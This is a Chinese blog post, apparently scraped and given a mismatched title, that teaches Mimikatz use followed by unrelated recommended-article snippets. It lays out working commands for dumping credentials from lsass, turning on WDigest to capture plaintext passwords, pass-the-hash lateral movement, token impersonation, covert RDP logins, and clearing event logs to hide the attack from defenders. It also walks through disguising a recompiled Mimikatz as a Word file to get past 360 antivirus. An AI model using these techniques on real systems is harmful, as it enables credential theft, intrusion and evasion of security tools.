360病毒库升级包,内网渗透的基本原理

0x01 工具介绍工具原理Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码。常见问题在 Windows Vista 系统之后不再存储 LM HASH,而 Windows 8.1 系统之后内存中也不再存储明文密码,因此在高版本 Windows 系统中无法利用 Mimikatz 直接读取明文密码。Mimikatz 能获取明文密码的关键是 wdigest,这是一个可逆算法,相关注册表存储位置如下:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)后续高版本的 Windows 系统不能读取明文是因为关闭了该注册表键,如果想要重新获取明文,只需要开启该注册表后再输入密码重新登录即可。

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1给小伙伴整理了相对应的学习资料,如果你需要的话,我也可以分享一部分出来(涉密部分分享不了),需要的可以

【一帮助网络安全学习一】关注我,私信回复“资料”免费领取256G网络安全自学资料0x02 基础使用常见用法Mimikatz 的启动需要管理员/SYSTEM权限运行,默认情况下拥有 32 位以及 64 位版本,在 Kali Linux 中默认存放位置为/usr/share/mimikatz,大多数人使用 Mimikatz 一般只用到两个命令,而对其他命令不太了解,接下来会为大家全面介绍 Mimikatz 这款神器。

privilege::debugsekurlsa::logonpasswords也可以使用一句话输出保存

mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonpasswords” “exit”> pssword.txt基本语法使用命令可查看全部功能模块

::

调试进程修改运行权限为SYSTEM

privilege::debugprivilege:: #查看 privilege 的运行模块

开启日志记录,保存读取的用户凭证信息

standard::log

0x03 常用模块Crypto模块加密模块主要用于导出可导出的证书,利用 CryptoAPI 函数访问证书,相当于简化版的 certutil。有时候一张合法的证书非常有用,当利用合法证书生成木马程序时可能被杀软认做白名单程序从而不进行查杀。相关参数如下:

/provider #指定提供者/providertype #指定提供类型/cngprovider #CNG提供者/export #导出密钥 PVK 文件

查看相关密钥的提供者

crypto::providers

 

查看当前系统存储信息

crypto::stores

 

常见的系统存储用户名包括:CURRENT_USERUSER_GROUP_POLICYLOCAL_MACHINELOCAL_MACHINE_GROUPLOCAL_MACHINE_ENTERPRISECURRENT_SERVICEUSERSSERVICES指定系统存储为local_machine进行查看

crypto::stores /systemstore:local_machine

 

查看用户当前证书

crypto::certificates

导出 ROOT 根证书

crypto::certificates /store:Root

 

导出证书必须配合 store 参数。其中公钥为DER,私钥为PFX,密码为 mimikatz

crypto::certificates /store:Root /export

 

使用 CryptoAPI 打补丁,有时候证书无法导出可能就是补丁没有打

crypto::capi

使用 CNG 打补丁,用于导出未标记可导出的证书

crypto::cng

列出智能读卡器,可能会出现报错

crypto::sc

查看相关密钥

crypto::key

 

使用 OpenSSL 生成证书

openssl rsa -inform pvk -in key.pvk -outform pem -out key.pemSekurlsa模块Sekurlsa 模块能从lsass.exe进程中提取 passwords、keys、pin、tickets 等用户凭据信息,是最常用到模块。查看所有身份认证信息,成功拿到用户明文密码

sekurlsa::logonpasswords

 

查看用户哈希可能会出现报错,这主要是由于当前权限较低

lsadump::sam

解决方法非常简单,只要以系统权限运行即可

process::runp在新窗口中再次运行可成功拿到哈希

重置用户 NTLM 哈希会把哈希直接写入 SAM 数据库当中,因此执行该操作相当于重置密码,再次登录需要使用新密码进行登录

lsadump::setntlm /user:admin /ntlm:b2781ba85ac750ec286744b009599637

 

转储并导出lsass.exe进程

sekurlsa::minidump lsass.tmp通过哈希传递进行横向移动

sekurlsa::pth /user:admin /domain:host1 /ntlm:b2781ba85ac750ec286744b009599637sekurlsa::pth /user:admin /domain:host1 /aes256:b2781ba85ac750ec286744b009599637凭证管理器中可查看 Windows 凭证

Token模块Token 模块主要用于查看、假冒现有 token。查看当前 token 信息

token::whoami

查看 token 列表并假冒系统管理员

token::listtoken::elevate /NT AUTHORITY\SYSTEM

 

还原假冒进程

token::revert

其他模块一般情况下重复登录远程桌面会导致已登录用户会直接退出或提示有其他用户登录

 

配合命令无提示登录远程桌面,该功能在 HW 中非常好用,即使管理员处于登录状态,我们仍能悄悄登录其他用户

ts::multirdp

成功登录原会话不受影响,使用命令查看会话列表

ts::sessions

 

虽然目前不会被已登录用户发现,但在事件查看器当中仍会存在登录日志

 

使用命令一键清除日志

event::clear

成功清除日志后蓝队工程师无法通过系统日志来还原攻击过程

 

安装/卸载 Mimikatz 服务,帮助我们监听用户输入

service::+service::-

成功安装 Mimikatz 服务且已自动启动

 

比如监听粘贴文本

misc::clip

0x04 免杀利用Mimikatz 作为最常用的黑客工具早已被各大安全软件标记,比如360杀毒、360安全卫士、卡巴斯基等。使用源码免杀能帮助我们绕过杀毒软件的查杀,这是一种基于特征码的免杀方式,只需定位到源码中的特征代码进行修改就可达到免杀效果,一般会定位三个位置,分别是代码、字符串和输入表。准备环境在免杀前需要准备以下三个要素:Mimikatz 源码Visual Stdio 2019(C++)vc依赖文件在 Github 中下载最新版的 Mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz

 

更新 360 杀毒、病毒库为最新版本

配置问题点击 Mimikatz 中的启动文件启动 Visual Stdio,在帮助菜单》关于〉查看许可证状态中输入激活证书可成功激活。而在 VS 2012 中如果出现报错信息(error MSB8020),解决方法为进入项目》属性〉常规》平台工作集中,将平台改为 VS 2012(v110)后即可成功运行编译。

 

选择生成出现报错界面,点击工具》获取工具和功能〉C++ 进行桌面开发》C++ Windows XP Support for VS 2017 v141,点击修改即可解决问题

 

下载安装完成后修改手工工具集为 2017 版本

 

在配置属性中的 C++ 中修改将警告视为错误改为否,否则每当出现错误就无法编译

重新生成又出现报错:MSB8036

在项目属性页选择已安装的 SDK 版本

点击重新生成后成功编译 32 位 Mimikatz

 

如果需要生成 64 位程序可在解决方案》配置属性选择平台为x64

点击重新生成成功编译 64 位 Mimikatz

免杀过程步入正题选择项目 mimikatz 的编辑》查找和替换》在文件中替换

把关键字 mimikatz 所有的字符串替换为 macsec,点击全部替换即可

由于字符串全部被替换,导致引入 mimikatz 的文件名也被替换,因此需修改全部文件名为 macsec

点击重新生成后输出macsec.exe

虽然目前能够进行静态查杀,但是还是无法绕过动态查杀

 

进一步删除macsec.c和macsec.h的注释信息

再次重新生成程序使用360测试仍无法绕过动态查杀

 

在macsec.rc中修改版本信息,把带有 gentilkiwi 的公司名修改为 macsec

 

修改图标macsec.ico为 Office Word 图标后再次点击生成

放入免杀环境再次运行即可成功绕过

当然命令也能够成功执行

 

完成免杀后可上传至云平台查杀测试,但一般不要这么做,云平台会标记免杀程序

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/323687.html

(0)

相关推荐

  • 图片转代码的手机软件有哪些

    又一数学神器来袭! 这是一个帮你快速把数学公式图片转成LaTeX代码的工具,名为Snip,可以免费下载使用。 操作非常简单! 下载工具之后,只需要一个快捷键,把数学公式截图下来,它就能给你LaTeX代码,你也可以直接在任务栏中修改代码,然后复制、粘贴,写出自己的公式。 而且,这一工具不仅仅适用于用电脑打出来的公式,你自己手写的公式,也可以识别出来(字迹还是要…

    2023-06-07 用户投稿
  • 汽车美容店加盟(汽车美容加盟连锁品牌)

    随着市场经济发展的多样化,汽车美容加盟连锁作为一种全新的商业模式,正在为越来越多的投资者和创业者所青睐。无可否认,在实际操作过程中,汽车美容加盟连锁行业鱼龙混杂,个别不法商人打着“汽车美容加盟”的幌子,干的却是骗人骗财的勾当。 有关人士指出,汽车美容加盟连锁的商业模式给一些资金有限、缺乏经验的投资者提供了好机会,但稍有不慎,就会中人圈套,“赔了夫人又折兵。”…

    2023-06-18
  • 文件系统类型,文件系统类型为exfat无法运行磁盘检查

    以下是一篇关于“文件系统类型”的文章: 一、文件系统类型的概述 文件系统类型可能是计算机系统中一个较为基础但又极其重要的概念。它就像是图书馆的分类系统,将计算机中的各种文件进行有序的组织和管理。不同的文件系统类型也许有着不同的特点和适用场景,就好像不同的图书馆有不同的分类方式来满足不同读者的需求。 从广义上来说,文件系统类型主要分为几种常见的类别。比如,磁盘…

    2025-09-28
  • 成功学到底有没有用(陈安之成功学)

      “相信我,国际管理咨询公司,一定能上市,中国,每一个人都能成功”这是《分手大师》中成功学大师唐大山的演讲词,成千上万、老老少少的观众,再鸟巢积聚,只为了听这场成功学演讲。 这不是只在电影中才出现的场景,而是真实存在在我们的生活里的现实。陈安之,第一代成功学大师,曾经点评过马云的人物。其实成功学原本是可以帮助人的,但却因为…

    2021-11-03 用户投稿
  • 如何做到广告的精准投放论文(广告精准投放)

    广告,可以说是一个让人们又爱又恨的东西。买家可以通过广告了解到市场上各种各样的产品信息,满足生活中的各种物资、精神等需求;商家也可以通过广告推广其产品,增加知名度和收益,尤其是对于一些新产品,商家更是会花费大量的资金用于产品宣传。然而让人十分头疼的一件事便是,市场上的产品成千上万,各种各样的广告层出不穷,我们的生活受到了广告铺天盖地的“轰炸”,让人十分苦恼。…

    2021-11-04
  • 在家做手工活不交押金(在家做手工活兼职)

    不久发了头条想找个手工活做,好多主动私信我的,包括小红书上也是更多来找我的   我并没有全部回复,也回复不过来,靠缘分吧,随机找了几个聊了聊,所有有押金的我都直接全部ps掉,因为之前了解到这种就是骗押金,无论你怎么做最终都会验货不合格押金也不退。 然而有一个人说是不需要押金的,并且连来回运费都不需要自己出,直接给他地址等待发货就可以,为了让大家看的…

    2021-10-28 用户投稿
  • 华为手机拍月亮专业模式参数(如何拍月亮专业模式华为)

    每一个热爱生活的人 都关注了“手机摄影技巧” 今晚又到了一年一度的中秋赏月时节了,月圆之夜除了与家人挚友对酒当歌,少不了用手机拍1张月亮照片,此情此景再赋诗一首,岂不快哉。 用手机怎么拍出一张高质量、有意境和美感的月亮照片?这篇教程详细讲解,欢迎分享教程给家人朋友,一起用手机拍月亮。 杨精坤/摄 华为P40 Pro iPhone xs max 手机拍月亮需要…

    2023-05-24 用户投稿
  • ns破解版和正版区别,盗版游戏与正版区别

    在遭遇一段时间的游戏荒后,隔壁阿小向我推荐了《生化危机 7》,听说有剧情有动作,玩一把配上爽过吸大蔴柠檬茶,盛夏天里的最高享受。 又逢 Steam 暑促,也就支持支持 G 胖当省几顿饭钱了! 然而我的决心被 288 这个数字彻底摧毁……..不由自主地点开了 3 大妈。 大妈诚不欺我,果然找到 XXGB 大小的《生化危机 7》 CPY …

    2023-07-03 用户投稿
  • 淘宝的违规行为分为哪两种,淘宝违规行为有几大类

    淘宝的违规行为分为哪两种 在淘宝的运营过程中,违规行为是一个需要引起重视的问题。 了解淘宝的违规行为分类,对于卖家和买家来说都非常重要。 那么,淘宝的违规行为到底分为哪两种呢? 一、一般违规行为 一般违规行为是指除严重违规行为外的其他违规行为。 这类违规行为通常对淘宝平台的正常秩序影响较小,但也需要引起卖家的注意。 1.描述不符 -这可能是卖家在商品描述中提…

    2025-02-25
  • 小爸爸夏天扮演者简介,小爸爸文章哭戏

    当年可是和妻子马伊琍刷屏各种电视剧。《小爸爸》就是文章自导自演的一部电视剧,开播以后收视率飙升。但是这部剧火的却并不是文章和马伊琍,而是一个8岁的孩子。 他叫朱佳煜,2005年出生于上海,生于普通的职工家庭,但这个小孩子可不简单,13年让文章选中,出演《小爸爸》中的夏天,调皮捣蛋的性格和很潮的样子一出场就受到了观众的喜爱。 朱佳煜在剧中的表现特别的好,只能说…

    2023-06-07 用户投稿
  • 直辖市有哪些(湖北省直辖市有哪些)

    相信大家都知道中国有四大直辖市,分别是上海、天津、北京以及重庆,这4个直辖市也是中国的一线城市,经济水平非常高,在当地建筑物也很多。作为中国经济非常繁华的4个城市,每年有很多人成为最适合城市探究,也成为大家最喜欢的是座旅游城市。众所周知,每个城市都有标志性的建筑物,而这4个城市作为中国四大直辖市,标志性的建筑物又是什么呢?接下来一起去了解一下吧。 上海东方明…

    2023-05-25 用户投稿
  • 做直播有什么好处?直播是最容易破圈,最容易产生影响力

    做直播,可是一件体力活,当然也是脑力活,是持久战,也是疲劳战。 尤其刚开始做直播的时候,没有那么多人观看,也没有那么多人打赏,也没有那么多人的同时在线,那么怎么去坚持做号直播呢。 给到的答案就是“抱团”,也就是要加入一个直播圈子,一个人在那里做,是很难坚持的,也难以做好的。 尤其是在什么都不懂的情况下进行,更是很难的。经过这些天的直播连麦活动,听了那么多嘉宾…

    2022-10-23